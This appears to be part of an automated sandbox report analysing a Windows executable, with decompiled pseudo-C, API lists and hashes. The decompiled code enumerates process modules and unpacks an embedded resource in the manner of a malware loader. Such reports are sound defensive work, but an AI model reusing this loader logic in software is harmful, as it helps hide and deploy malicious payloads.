											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543);
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x74f3cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
                                                                                                                                                                                                      						_t547 = _t428;
                                                                                                                                                                                                      						_t520 = _t565 + 0x298;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t429 =  *_t520;
                                                                                                                                                                                                      							if(_t429 !=  *_t547) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t429 == 0) {
                                                                                                                                                                                                      								L7:
                                                                                                                                                                                                      								_t429 = 0;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                      								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                      									break;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t520 = _t520 + 2;
                                                                                                                                                                                                      									_t547 = _t547 + 2;
                                                                                                                                                                                                      									if(_t493 != 0) {
                                                                                                                                                                                                      										continue;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L7;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							if(_t429 != 0) {
                                                                                                                                                                                                      								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                      								_t557 = _t565 + 8;
                                                                                                                                                                                                      								_t548 = _t431;
                                                                                                                                                                                                      								_t488 = _t557 + 0x298;
                                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                                      									_t432 =  *_t488;
                                                                                                                                                                                                      									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                      									if(_t432 !=  *_t548) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags = _t432;
                                                                                                                                                                                                      									if(_t432 == 0) {
                                                                                                                                                                                                      										L16:
                                                                                                                                                                                                      										_t432 = 0;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                      										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                      										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                      											break;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t488 = _t488 + 2;
                                                                                                                                                                                                      											_t548 = _t548 + 2;
                                                                                                                                                                                                      											__eflags = _t432;
                                                                                                                                                                                                      											if(_t432 != 0) {
                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L16;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L18:
                                                                                                                                                                                                      									__eflags = _t432;
                                                                                                                                                                                                      									if(_t432 == 0) {
                                                                                                                                                                                                      										goto L10;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                      										__eflags = _t435;
                                                                                                                                                                                                      										if(_t435 != 0) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                      												_t566 = _t557 + 8;
                                                                                                                                                                                                      												_t549 = _t437;
                                                                                                                                                                                                      												_t490 = _t566 + 0x298;
                                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                                      													_t438 =  *_t490;
                                                                                                                                                                                                      													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                      													if(_t438 !=  *_t549) {
                                                                                                                                                                                                      														break;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t438;
                                                                                                                                                                                                      													if(_t438 == 0) {
                                                                                                                                                                                                      														L26:
                                                                                                                                                                                                      														_t438 = 0;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                      														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                      														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                      															break;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t490 = _t490 + 2;
                                                                                                                                                                                                      															_t549 = _t549 + 2;
                                                                                                                                                                                                      															__eflags = _t438;
                                                                                                                                                                                                      															if(_t438 != 0) {
                                                                                                                                                                                                      																continue;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																goto L26;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													L28:
                                                                                                                                                                                                      													__eflags = _t438;
                                                                                                                                                                                                      													if(_t438 == 0) {
                                                                                                                                                                                                      														goto L10;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                      														_t557 = _t566 + 8;
                                                                                                                                                                                                      														_t550 = _t439;
                                                                                                                                                                                                      														_t492 = _t557 + 0x298;
                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                      															_t440 =  *_t492;
                                                                                                                                                                                                      															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                      															if(_t440 !=  *_t550) {
                                                                                                                                                                                                      																break;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															__eflags = _t440;
                                                                                                                                                                                                      															if(_t440 == 0) {
                                                                                                                                                                                                      																L34:
                                                                                                                                                                                                      																_t440 = 0;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                      																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                      																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                      																	break;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t492 = _t492 + 2;
                                                                                                                                                                                                      																	_t550 = _t550 + 2;
                                                                                                                                                                                                      																	__eflags = _t440;
                                                                                                                                                                                                      																	if(_t440 != 0) {
                                                                                                                                                                                                      																		continue;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L34;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															L36:
                                                                                                                                                                                                      															__eflags = _t440;
                                                                                                                                                                                                      															if(_t440 == 0) {
                                                                                                                                                                                                      																goto L10;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																goto L37;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L81;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														asm("sbb eax, eax");
                                                                                                                                                                                                      														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      														goto L36;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													goto L81;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												asm("sbb eax, eax");
                                                                                                                                                                                                      												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      												goto L28;
                                                                                                                                                                                                      												L37:
                                                                                                                                                                                                      												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                      												__eflags = _t442;
                                                                                                                                                                                                      											} while (_t442 != 0);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L38;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L81;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								CloseHandle(_t525);
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L81;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                                      						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L81:
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x00401dec
                                                                                                                                                                                                      0x00401df1
                                                                                                                                                                                                      0x00401df6
                                                                                                                                                                                                      0x00401dfb
                                                                                                                                                                                                      0x00401e00
                                                                                                                                                                                                      0x00401e05
                                                                                                                                                                                                      0x00401e0a
                                                                                                                                                                                                      0x00401e0f
                                                                                                                                                                                                      0x00401e14
                                                                                                                                                                                                      0x00401e19
                                                                                                                                                                                                      0x00401e1e
                                                                                                                                                                                                      0x00401e23
                                                                                                                                                                                                      0x00401e28
                                                                                                                                                                                                      0x00401e2d
                                                                                                                                                                                                      0x00401e32
                                                                                                                                                                                                      0x00401e37
                                                                                                                                                                                                      0x00401e3c
                                                                                                                                                                                                      0x00401e41
                                                                                                                                                                                                      0x00401e46
                                                                                                                                                                                                      0x00401e4b
                                                                                                                                                                                                      0x00401e50
                                                                                                                                                                                                      0x00401e55
                                                                                                                                                                                                      0x00401e5a
                                                                                                                                                                                                      0x00401e5f
                                                                                                                                                                                                      0x00401e64
                                                                                                                                                                                                      0x00401e69
                                                                                                                                                                                                      0x00401e6e
                                                                                                                                                                                                      0x00401e73
                                                                                                                                                                                                      0x00401e78
                                                                                                                                                                                                      0x00401e7d
                                                                                                                                                                                                      0x00401e82
                                                                                                                                                                                                      0x00401e86
                                                                                                                                                                                                      0x00401e8b
                                                                                                                                                                                                      0x00401e96
                                                                                                                                                                                                      0x00401e9a
                                                                                                                                                                                                      0x00401ea4
                                                                                                                                                                                                      0x00401eaf
                                                                                                                                                                                                      0x00401eba
                                                                                                                                                                                                      0x00401ebf
                                                                                                                                                                                                      0x00401ec4
                                                                                                                                                                                                      0x00401ec6
                                                                                                                                                                                                      0x00401ecb
                                                                                                                                                                                                      0x00401ece
                                                                                                                                                                                                      0x00401ed2
                                                                                                                                                                                                      0x00401ed4
                                                                                                                                                                                                      0x00401eef
                                                                                                                                                                                                      0x00401ed6
                                                                                                                                                                                                      0x00401edd
                                                                                                                                                                                                      0x00401ee2
                                                                                                                                                                                                      0x00401ee6
                                                                                                                                                                                                      0x00401ee9
                                                                                                                                                                                                      0x00401ee9
                                                                                                                                                                                                      0x00401ef7
                                                                                                                                                                                                      0x00401efc
                                                                                                                                                                                                      0x00401f02
                                                                                                                                                                                                      0x00401f08
                                                                                                                                                                                                      0x00401f0c
                                                                                                                                                                                                      0x00401f15
                                                                                                                                                                                                      0x00401f18
                                                                                                                                                                                                      0x00401f1a
                                                                                                                                                                                                      0x00401f1c
                                                                                                                                                                                                      0x00401f22
                                                                                                                                                                                                      0x00401f22
                                                                                                                                                                                                      0x00401f24
                                                                                                                                                                                                      0x00401f28
                                                                                                                                                                                                      0x00401f2f
                                                                                                                                                                                                      0x00401f33
                                                                                                                                                                                                      0x00401f33
                                                                                                                                                                                                      0x00401f40
                                                                                                                                                                                                      0x00401f45
                                                                                                                                                                                                      0x00401f4a
                                                                                                                                                                                                      0x00401f4b
                                                                                                                                                                                                      0x00401f50
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f58
                                                                                                                                                                                                      0x00401f33
                                                                                                                                                                                                      0x00401f63
                                                                                                                                                                                                      0x00401f63
                                                                                                                                                                                                      0x00401f69
                                                                                                                                                                                                      0x00401f72
                                                                                                                                                                                                      0x00401f72
                                                                                                                                                                                                      0x00401f72
                                                                                                                                                                                                      0x00401f73
                                                                                                                                                                                                      0x00401f75
                                                                                                                                                                                                      0x00401f7b
                                                                                                                                                                                                      0x00401f80
                                                                                                                                                                                                      0x00401f81
                                                                                                                                                                                                      0x00401f86
                                                                                                                                                                                                      0x00401f86
                                                                                                                                                                                                      0x00401f8c
                                                                                                                                                                                                      0x00401f8d
                                                                                                                                                                                                      0x00401f8d
                                                                                                                                                                                                      0x00401f9d
                                                                                                                                                                                                      0x00401fa2
                                                                                                                                                                                                      0x00401fa6
                                                                                                                                                                                                      0x00401fac
                                                                                                                                                                                                      0x00401faf
                                                                                                                                                                                                      0x00401fb6
                                                                                                                                                                                                      0x00401fbf
                                                                                                                                                                                                      0x00401fc4
                                                                                                                                                                                                      0x00401fc8
                                                                                                                                                                                                      0x00401fce
                                                                                                                                                                                                      0x00401fd3
                                                                                                                                                                                                      0x00401fe0
                                                                                                                                                                                                      0x00401fec
                                                                                                                                                                                                      0x00401ffe
                                                                                                                                                                                                      0x00402001
                                                                                                                                                                                                      0x00402006
                                                                                                                                                                                                      0x0040200b
                                                                                                                                                                                                      0x00402010
                                                                                                                                                                                                      0x00402015
                                                                                                                                                                                                      0x0040201a
                                                                                                                                                                                                      0x0040201f
                                                                                                                                                                                                      0x00402024
                                                                                                                                                                                                      0x00402029
                                                                                                                                                                                                      0x0040202e
                                                                                                                                                                                                      0x00402033
                                                                                                                                                                                                      0x00402038
                                                                                                                                                                                                      0x0040203d
                                                                                                                                                                                                      0x00402042
                                                                                                                                                                                                      0x00402047
                                                                                                                                                                                                      0x0040204c
                                                                                                                                                                                                      0x00402051
                                                                                                                                                                                                      0x00402056
                                                                                                                                                                                                      0x0040205b
                                                                                                                                                                                                      0x00402060
                                                                                                                                                                                                      0x00402065
                                                                                                                                                                                                      0x0040206a
                                                                                                                                                                                                      0x0040206f
                                                                                                                                                                                                      0x00402074
                                                                                                                                                                                                      0x00402079
                                                                                                                                                                                                      0x0040207e
                                                                                                                                                                                                      0x0040245f
                                                                                                                                                                                                      0x004021ca
                                                                                                                                                                                                      0x0040246a
                                                                                                                                                                                                      0x0040246e
                                                                                                                                                                                                      0x00402470
                                                                                                                                                                                                      0x00402478
                                                                                                                                                                                                      0x00402478
                                                                                                                                                                                                      0x0040247a
                                                                                                                                                                                                      0x0040247e
                                                                                                                                                                                                      0x00402480
                                                                                                                                                                                                      0x00402488
                                                                                                                                                                                                      0x00402488
                                                                                                                                                                                                      0x00402480
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c55
                                                                                                                                                                                                      0x00401c62
                                                                                                                                                                                                      0x00401c67
                                                                                                                                                                                                      0x00401c6a
                                                                                                                                                                                                      0x00401c6c
                                                                                                                                                                                                      0x00401c73
                                                                                                                                                                                                      0x00401c73
                                                                                                                                                                                                      0x00401c77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c7b
                                                                                                                                                                                                      0x00401c8f
                                                                                                                                                                                                      0x00401c8f
                                                                                                                                                                                                      0x00401c7d
                                                                                                                                                                                                      0x00401c7d
                                                                                                                                                                                                      0x00401c83
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c85
                                                                                                                                                                                                      0x00401c85
                                                                                                                                                                                                      0x00401c88
                                                                                                                                                                                                      0x00401c8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401c8d
                                                                                                                                                                                                      0x00401c83
                                                                                                                                                                                                      0x00401c98
                                                                                                                                                                                                      0x00401c9a
                                                                                                                                                                                                      0x00401cbd
                                                                                                                                                                                                      0x00401cc2
                                                                                                                                                                                                      0x00401cc5
                                                                                                                                                                                                      0x00401cc7
                                                                                                                                                                                                      0x00401cd0
                                                                                                                                                                                                      0x00401cd0
                                                                                                                                                                                                      0x00401cd2
                                                                                                                                                                                                      0x00401cd4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cd6
                                                                                                                                                                                                      0x00401cd8
                                                                                                                                                                                                      0x00401cec
                                                                                                                                                                                                      0x00401cec
                                                                                                                                                                                                      0x00401cda
                                                                                                                                                                                                      0x00401cda
                                                                                                                                                                                                      0x00401cdd
                                                                                                                                                                                                      0x00401ce0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401ce2
                                                                                                                                                                                                      0x00401ce2
                                                                                                                                                                                                      0x00401ce5
                                                                                                                                                                                                      0x00401ce8
                                                                                                                                                                                                      0x00401cea
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cea
                                                                                                                                                                                                      0x00401ce0
                                                                                                                                                                                                      0x00401cf5
                                                                                                                                                                                                      0x00401cf5
                                                                                                                                                                                                      0x00401cf7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401cf9
                                                                                                                                                                                                      0x00401d02
                                                                                                                                                                                                      0x00401d07
                                                                                                                                                                                                      0x00401d09
                                                                                                                                                                                                      0x00401d10
                                                                                                                                                                                                      0x00401d1d
                                                                                                                                                                                                      0x00401d22
                                                                                                                                                                                                      0x00401d25
                                                                                                                                                                                                      0x00401d27
                                                                                                                                                                                                      0x00401d30
                                                                                                                                                                                                      0x00401d30
                                                                                                                                                                                                      0x00401d32
                                                                                                                                                                                                      0x00401d34
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d36
                                                                                                                                                                                                      0x00401d38
                                                                                                                                                                                                      0x00401d4c
                                                                                                                                                                                                      0x00401d4c
                                                                                                                                                                                                      0x00401d3a
                                                                                                                                                                                                      0x00401d3a
                                                                                                                                                                                                      0x00401d3d
                                                                                                                                                                                                      0x00401d40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d42
                                                                                                                                                                                                      0x00401d42
                                                                                                                                                                                                      0x00401d45
                                                                                                                                                                                                      0x00401d48
                                                                                                                                                                                                      0x00401d4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d4a
                                                                                                                                                                                                      0x00401d40
                                                                                                                                                                                                      0x00401d55
                                                                                                                                                                                                      0x00401d55
                                                                                                                                                                                                      0x00401d57
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d5d
                                                                                                                                                                                                      0x00401d6a
                                                                                                                                                                                                      0x00401d6f
                                                                                                                                                                                                      0x00401d72
                                                                                                                                                                                                      0x00401d74
                                                                                                                                                                                                      0x00401d80
                                                                                                                                                                                                      0x00401d80
                                                                                                                                                                                                      0x00401d82
                                                                                                                                                                                                      0x00401d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00401d86
                                                                                                                                                                                                      0x00401d88
                                                                                                                                                                                                      0x00401d9c
                                                                                                                                                                                                      0x00401d9c
                                                                                                                                                                                                      0x00401d8a
                                                                                                                                                                                                      0x00401d8a
                                                                                                                                                                                                      0x00401d8d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                      • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                      • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                      • API String ID: 2366190142-2962942730
                                                                                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t12;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				char* _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __edx;
                                                                                                                                                                                                      				_t35 = _a4;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				if(_t35 != 0) {
                                                                                                                                                                                                      					_t25 = lstrlenA(_t35) + 1;
                                                                                                                                                                                                      					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                                                                                                                      					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t30 =  ~_t12 + 1;
                                                                                                                                                                                                      					if(_t30 != 0) {
                                                                                                                                                                                                      						_t12 = GetLastError();
                                                                                                                                                                                                      						if(_t12 == 0x7a) {
                                                                                                                                                                                                      							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                                                                                                                      							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                                                                                                                      							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                                                                      							_t30 =  ~_t12 + 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t30 != 0) {
                                                                                                                                                                                                      							_t12 = E00401030();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *__ecx = _t35;
                                                                                                                                                                                                      					return __eax;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00401900

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
